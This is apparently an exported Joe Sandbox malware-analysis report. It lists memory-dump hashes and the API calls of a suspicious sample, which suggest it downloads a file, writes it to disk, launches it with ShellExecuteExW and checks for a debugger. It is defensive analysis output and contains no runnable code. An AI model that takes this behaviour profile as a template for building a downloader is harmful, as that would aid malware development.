                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0219ee275bf2be423848f3977fdd8c2b69a1aea69776533fd2e59331ad4c827
                                        • Instruction ID: 92deea14ff095fd08786e11d05065aef3c6804bfe56240dd02f2324e168832f3
                                        • Opcode Fuzzy Hash: c0219ee275bf2be423848f3977fdd8c2b69a1aea69776533fd2e59331ad4c827
                                        • Instruction Fuzzy Hash: AE412D70A0021A9FDB44DFA8C940AAEFBF2FF88304F158595D609AB355DB34D945CFA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28161e27fd8aadbfa12465c667c489334d6824e3cdaa5bb80ec5f4b2f66a34bd
                                        • Instruction ID: 1d211602465af28f2b074b0aad908ce0cb59b865db25663ac09a7026fb4ff05d
                                        • Opcode Fuzzy Hash: 28161e27fd8aadbfa12465c667c489334d6824e3cdaa5bb80ec5f4b2f66a34bd
                                        • Instruction Fuzzy Hash: 4B413B306007006FD315EB25E940B5ABBE2EF81310F44CAADC15A8BBA5DB74AD89CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49ca35de715c34f044fc5b928e075aecbc31b03924136f575c1c7da269b36eed
                                        • Instruction ID: 2212293c72a355d9060d8d9c7de914331ecc173a24a07a20b70574ff6df979ab
                                        • Opcode Fuzzy Hash: 49ca35de715c34f044fc5b928e075aecbc31b03924136f575c1c7da269b36eed
                                        • Instruction Fuzzy Hash: 464139306007006FD315FB25E940B5ABBE2EF81310F44CAA9D15A8BB65DB74FD89CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 058a248ddfa5e6ce348324de05ee1e70a31f973eb21723701e0969fc3db1a320
                                        • Instruction ID: d3bb62beade79fe8e37ed8fc0fbc1c2dba0a3fd7afc2713babc0fa9c4aeff8f7
                                        • Opcode Fuzzy Hash: 058a248ddfa5e6ce348324de05ee1e70a31f973eb21723701e0969fc3db1a320
                                        • Instruction Fuzzy Hash: 75419F7970424A8FC741CF28D49096AFFB1FF8A21471986DAD954DB652D730EC99CBC0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be846b0c59bd83e3d542ca9d181e20f1b9b514ce76f26ac95f2074f93f0c2fd4
                                        • Instruction ID: 2208c4c75ed3385a0774745e0f1ea6c39a442bcd675018d3a85322cd09f48c2d
                                        • Opcode Fuzzy Hash: be846b0c59bd83e3d542ca9d181e20f1b9b514ce76f26ac95f2074f93f0c2fd4
                                        • Instruction Fuzzy Hash: 3D410835B041099FCB55DF68C58896ABFF1EF89214B1580DAE945DB372DB30EC85CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a1320709f1b4418a8da418bd38f9b100d6088ece5b8113f36abb04a66c4984
                                        • Instruction ID: b5d514c4dd4d1c1f88fc55e44daf39aa01d402d8de1353bfa67d0b3bab4eb835
                                        • Opcode Fuzzy Hash: 07a1320709f1b4418a8da418bd38f9b100d6088ece5b8113f36abb04a66c4984
                                        • Instruction Fuzzy Hash: 5531AD35B40251AFCB45DF38D884A6EBBB2FF89300B1084A9E905CB765DB31ED56CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a29398334eba765e402db7c586a432953a00c4f7798bea5c71ca78fb0faea951
                                        • Instruction ID: abd1ebfdee04f2a482a910eedf44d7ff6f8c5efd20f82f21bec57c3ea3829122
                                        • Opcode Fuzzy Hash: a29398334eba765e402db7c586a432953a00c4f7798bea5c71ca78fb0faea951
                                        • Instruction Fuzzy Hash: E0316D34B401048FD759EB7989A473E7AE3EBCC74175888A8E50EDB398DE359D478B80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67d7bd5f923c6a023b3887cc52c2e9d0829fda5cf4051089c39f602f34a38555
                                        • Instruction ID: 93a21f3ab8ec263511c9a700a506b7998ad7a6de65b8b190100be5bdbb6bed5e
                                        • Opcode Fuzzy Hash: 67d7bd5f923c6a023b3887cc52c2e9d0829fda5cf4051089c39f602f34a38555
                                        • Instruction Fuzzy Hash: 17318F34B401004FC759EB7989A433E7AE3EBCC75075488A8E50ADB398DE359C478B80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbc1db7b731d64bf7e44a20da722fe007cff26f075b2c978fda8a4d464b90040
                                        • Instruction ID: 6546189486749bcaedd44a92fd3553d085228552a5883350c2d3942c7348fbbb
                                        • Opcode Fuzzy Hash: bbc1db7b731d64bf7e44a20da722fe007cff26f075b2c978fda8a4d464b90040
                                        • Instruction Fuzzy Hash: 2A318435B002049FC708EF79C454A6EB7F6FF89710B2485AAE959DB360CB359C46CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b79bc31836b72e684e89d365d8deabbf8a23d251c39a8c0b405a6743df32c8e
                                        • Instruction ID: fab36b4ca419080be796a7086524e2959a1324ec9da74394720b72319b6b68fb
                                        • Opcode Fuzzy Hash: 7b79bc31836b72e684e89d365d8deabbf8a23d251c39a8c0b405a6743df32c8e
                                        • Instruction Fuzzy Hash: 41217E31B403006FE319AA31A86573F6753EBC1750F0889A8D9168F794DD75DD4B9784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449e74ee77ea758bd05a487eef6e25e883b0a9e711f8d75f06171b69e5c230dd
                                        • Instruction ID: d72f3a845628d4750177b913b5674c250372b262e12832e550fae9cf3eb2219e
                                        • Opcode Fuzzy Hash: 449e74ee77ea758bd05a487eef6e25e883b0a9e711f8d75f06171b69e5c230dd
                                        • Instruction Fuzzy Hash: 3B21D576B0015A8FDF10EFA9E4407EEBBF1EF88300F0449A9D541A729ACB355949CB60
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dcd2f0b02b044a5691400720e1c63e440e1e290ab50bc7ee054725ac0ce21c2
                                        • Instruction ID: 3b2c5e3aa0c74ddad0b7c06ea50805d106eb6b15cff11c1ea3b68a64e0c04f22
                                        • Opcode Fuzzy Hash: 5dcd2f0b02b044a5691400720e1c63e440e1e290ab50bc7ee054725ac0ce21c2
                                        • Instruction Fuzzy Hash: 5F117231B401088BDB64AB64D45A7AEBBB6EF88751F040869D90AF3390CF754C59CB95
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b52dab5a9bffba6e1dd67b21bb802f20990c27c9e92c456eeddcd0a537e5769d
                                        • Instruction ID: 0cfa12385313548fbd4c0ee13db575278642ee67494246989f8a780b37554c83
                                        • Opcode Fuzzy Hash: b52dab5a9bffba6e1dd67b21bb802f20990c27c9e92c456eeddcd0a537e5769d
                                        • Instruction Fuzzy Hash: 5911E2717043128FCB20DF69D854A1ABBF6FF843207544A6DEA068B754DB75EC058B90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f448dadf3891759d518270ce69d030a82710c672672655f6a60010b2779b80d5
                                        • Instruction ID: 8e4633f16a5303321602699496d329d0c5f079b1de3794f06adf20a8dc189597
                                        • Opcode Fuzzy Hash: f448dadf3891759d518270ce69d030a82710c672672655f6a60010b2779b80d5
                                        • Instruction Fuzzy Hash: BB21B171A006098FCF11DF59D4C49AEFBB6FF84314B0489A9DA2997255D730E824CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffccf6a4ebd1165c60f525b188eead762942c18deb5e7b5449d481bb4f6bc63d
                                        • Instruction ID: 6178236d57d5064bc20ccd042f7dd9280e7d560b42e306c51ac21cffbefe7cd0
                                        • Opcode Fuzzy Hash: ffccf6a4ebd1165c60f525b188eead762942c18deb5e7b5449d481bb4f6bc63d
                                        • Instruction Fuzzy Hash: 8A11C462E092E55FD7129B78AC646FA7FB4EF96210B0900EBD594C7553E614840AC362
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca594d1808ea3ecece85499e0804cf23673115f59aa7787955ab006d68c4fdb7
                                        • Instruction ID: b9d30052d0898ce6e74d6929bee2d79f7d30a0341746c6acce86aef02f96c603
                                        • Opcode Fuzzy Hash: ca594d1808ea3ecece85499e0804cf23673115f59aa7787955ab006d68c4fdb7
                                        • Instruction Fuzzy Hash: 7D116634A002049FC708EF79C458A6ABBF6FF89750F1584AAD559DB361CA359C45CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c90fa1fd13a864a4467fcd12990af00d89ad39cbf6a83b21620f7a27a048da8
                                        • Instruction ID: d01e6a599406d9d8084ffd67292a323bee5c92b61094646aa07462e816a9630c
                                        • Opcode Fuzzy Hash: 9c90fa1fd13a864a4467fcd12990af00d89ad39cbf6a83b21620f7a27a048da8
                                        • Instruction Fuzzy Hash: 2311A0717043168FCB209F69D894A2BBBF6FFC43247104A6DEA0A8B714DB75EC058B94
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 765c8c504dcc709787e0f19137fd8041d7f8dd4b1e81c925c451133e6b9d2b9b
                                        • Instruction ID: 9ccfe4943fe5f78fbe0ce5a4c1cfc5625863d12879ba802ac4b57882a61a493f
                                        • Opcode Fuzzy Hash: 765c8c504dcc709787e0f19137fd8041d7f8dd4b1e81c925c451133e6b9d2b9b
                                        • Instruction Fuzzy Hash: 0C1160316407015FC715DB28D94495ABBB2EFC13143188EAED06A8B365DB71E94BCB80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fde983465b368a126487d5123313d72e8231158e1776677e015e936e150e9580
                                        • Instruction ID: 0f2d287a2f07277ed4d756201822f792b755623d15f97eba95a82d6df5a6efe6
                                        • Opcode Fuzzy Hash: fde983465b368a126487d5123313d72e8231158e1776677e015e936e150e9580
                                        • Instruction Fuzzy Hash: 3701C070B012406FC3099A799914726BBE6EFCA310F1440AEE60ACB385DE31DC45CBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 119145914df42297795750615187f6c06a1e00a8b9ddd298ac76c698943e9043
                                        • Instruction ID: 0cb430ac95094f71d99814f82e9e5bf1d5ccd60caf7e21866d0b6cac68d1748c
                                        • Opcode Fuzzy Hash: 119145914df42297795750615187f6c06a1e00a8b9ddd298ac76c698943e9043
                                        • Instruction Fuzzy Hash: C7017171B002199FCB10DAA9EC44ABFB7AAEB88611B10443AE619D3640EB319D1687A1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e105b1221cc32d6fdcd2c80ce7e68438be2e4832d6cdc8632ad63111717c078
                                        • Instruction ID: bcdd79cf01ce6a91129bfb8a2a7098eecb246baf15e92ef1acd6012d8f435ee9
                                        • Opcode Fuzzy Hash: 2e105b1221cc32d6fdcd2c80ce7e68438be2e4832d6cdc8632ad63111717c078
                                        • Instruction Fuzzy Hash: 140176722043594FD710AA6DD9A4BBBBFE4EF81210F0448BED546C3292C6348A4CC360
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a70032d322fe98c8ca9d9f681127adec423f7b1b2e624c9b2ea10696a1405a4
                                        • Instruction ID: 1889c39c2d50b1632bb5a3e64afca13faa6ba2834daaec017b4d3df7a5ed8f19
                                        • Opcode Fuzzy Hash: 9a70032d322fe98c8ca9d9f681127adec423f7b1b2e624c9b2ea10696a1405a4
                                        • Instruction Fuzzy Hash: 08012D726043194FD710AE5ED4947BBBBE9EB80354F04497ADA05C3292C7759D8CD360
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f43b4f60609b02a4410e275d7a405e381a6daaa6608b0711d33f92e634e0f812
                                        • Instruction ID: 2ee355114a9aa88ddf8f2f7dd5cd4d7accf9b8649cf4b80b8d79e4e30ef5fe3d
                                        • Opcode Fuzzy Hash: f43b4f60609b02a4410e275d7a405e381a6daaa6608b0711d33f92e634e0f812
                                        • Instruction Fuzzy Hash: 470113753002058FC744DB2AD884E5ABBF9EF8922071685AAE605CB332DB71EC45CB90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ccb0bc737714ef550cb640a4bf68fb75a67c80ed67967185e855dc4da3b21bd0
                                        • Instruction ID: 3d25076b900c730f1daa0b2e220db8ccbba60582eb6460c712513b54e99c8aa9
                                        • Opcode Fuzzy Hash: ccb0bc737714ef550cb640a4bf68fb75a67c80ed67967185e855dc4da3b21bd0
                                        • Instruction Fuzzy Hash: E91126311093828FC3229B28D5546C9FFA1DF42314F14C6EAE0994F2A7D730A84BCB41
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e39a124010bf0c41cda6fc2dbfe3cc9886e03be9a88c345fa82dc003f91b3eb
                                        • Instruction ID: fa9c56e28634f811e89c0b125061351664a3de19b1e134b6b2be27cb3b5c6700
                                        • Opcode Fuzzy Hash: 5e39a124010bf0c41cda6fc2dbfe3cc9886e03be9a88c345fa82dc003f91b3eb

                                        Control-flow Graph (graph image not rendered in this export; legend: Executed / Not Executed)
                                        APIs
                                        • new.LIBCMT ref: 00851F3A
                                          • Part of subcall function 008511A0: GetModuleHandleW.KERNEL32(KERNEL32), ref: 008511B9
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 008511EC
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00851226
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(41797261,CoInitialize), ref: 00851243
                                          • Part of subcall function 00851D70: GetConsoleWindow.KERNEL32 ref: 00851D8B
                                          • Part of subcall function 00851D70: ShellExecuteExW.SHELL32(0000003C), ref: 00851E2E
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc$ConsoleExecuteHandleModuleShellWindow
                                        • String ID:
                                        • API String ID: 2699191150-0
                                        • Opcode ID: 35250e0829b1440e5a89fc2f4ec2a4209009ce43d6bca4431e7efa9cedded3c7
                                        • Instruction ID: ff97ce8fc8b2c4508e0473d07dc4af783c4cee66033c7bb5abbbf7ce80180426
                                        • Opcode Fuzzy Hash: 35250e0829b1440e5a89fc2f4ec2a4209009ce43d6bca4431e7efa9cedded3c7
                                        • Instruction Fuzzy Hash: C3018FB0A046449FCB14DF68EE05B1977E8FB08715F405279FC18C7380EB74A9048B81

                                        Control-flow Graph (graph image not rendered in this export)
                                        APIs
                                        • CoCreateInstance.OLE32(00863E00,00000000,00000017,00863E10,?,3B4B4A20), ref: 00851988
                                          • Part of subcall function 008510A0: new.LIBCMT ref: 008510C9
                                          • Part of subcall function 008510A0: SysAllocString.OLEAUT32 ref: 008510F2
                                          • Part of subcall function 008510A0: _com_issue_error.COMSUPP ref: 00851108
                                          • Part of subcall function 008510A0: _com_issue_error.COMSUPP ref: 00851121
                                        • new.LIBCMT ref: 008519C1
                                        • _com_util::ConvertStringToBSTR.COMSUPP ref: 008519EA
                                        • _com_issue_error.COMSUPP ref: 00851A08
                                        • InterlockedDecrement.KERNEL32(00000008), ref: 00851A45
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851A5C
                                        • InterlockedDecrement.KERNEL32(?), ref: 00851A9B
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851AB0
                                        • SafeArrayGetDim.OLEAUT32(?), ref: 00851B5E
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00851B7C
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,00000000), ref: 00851B91
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00851BAA
                                        • lstrcatW.KERNEL32(?,00863D2C), ref: 00851C14
                                        • lstrcatW.KERNEL32(?,00000002), ref: 00851C1E
                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00851CE2
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00851D0C
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00851D28
                                        • VariantClear.OLEAUT32(?), ref: 00851D3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ArraySafe$String$_com_issue_error$BoundCreateDataDecrementFileFreeInterlockedlstrcat$AccessAllocClearConvertInstanceUnaccessVariantWrite_com_util::
                                        • String ID: $"$%$.$3$GET$M$Pou$T$a$g$l$n$o$r$x
                                        • API String ID: 2252369171-1015696063
                                        • Opcode ID: 8f8af75e2248928f688c719ad3502109c904151de5895974c19f55aebd7503f6
                                        • Instruction ID: d56191d534f9e7e359ab3a03a6c40b1f028b518ef0bfacdebecb59c5bbfc6e8b
                                        • Opcode Fuzzy Hash: 8f8af75e2248928f688c719ad3502109c904151de5895974c19f55aebd7503f6
                                        • Instruction Fuzzy Hash: 42C14C719016299FDB219F64DC8CB9ABBB8FF04705F1042A8E909E7291DB759E88CF50

                                        Control-flow Graph (graph image not rendered in this export)
                                        APIs
                                        • GetConsoleWindow.KERNEL32 ref: 00851D8B
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00851E2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ConsoleExecuteShellWindow
                                        • String ID: <$r
                                        • API String ID: 1235396993-2647864400
                                        • Opcode ID: 92f05b285a24192e7c9c9e0f19bc2bff0202e48a592ad7bc2ae6deb31f64313b
                                        • Instruction ID: edafc0a400d05c895dd7fc4979f61555f0965989d9c20256bc26ddcba869edef
                                        • Opcode Fuzzy Hash: 92f05b285a24192e7c9c9e0f19bc2bff0202e48a592ad7bc2ae6deb31f64313b
                                        • Instruction Fuzzy Hash: 0421C970A012189FDB10DF98DD89B9977F8FB48304F4151E9E908EB391DBB5AA48CF45

                                        Control-flow Graph (rendered graph not reproduced; basic blocks 8589a8-858a5d, GetStdHandle called in block 8589f2, GetFileType in block 858a05)
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 008589F4
                                        • GetFileType.KERNEL32(00000000), ref: 00858A06
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: FileHandleType
                                        • String ID:
                                        • API String ID: 3000768030-0
                                        • Opcode ID: cf290126331aa08ec1a4f4fb53f524c49cf77017627f10c6cedd426424f37d3c
                                        • Instruction ID: b9c11a5cfdf443b2bb4ff19938fca21fd89acd73f6e779346e46768d70886152
                                        • Opcode Fuzzy Hash: cf290126331aa08ec1a4f4fb53f524c49cf77017627f10c6cedd426424f37d3c
                                        • Instruction Fuzzy Hash: 3C11A231104762C6CB364A3D8C88632BE95F756337B380B1BD8B7E61F2CF24D8899646
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0085551F
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00855529
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00855536
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmp
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
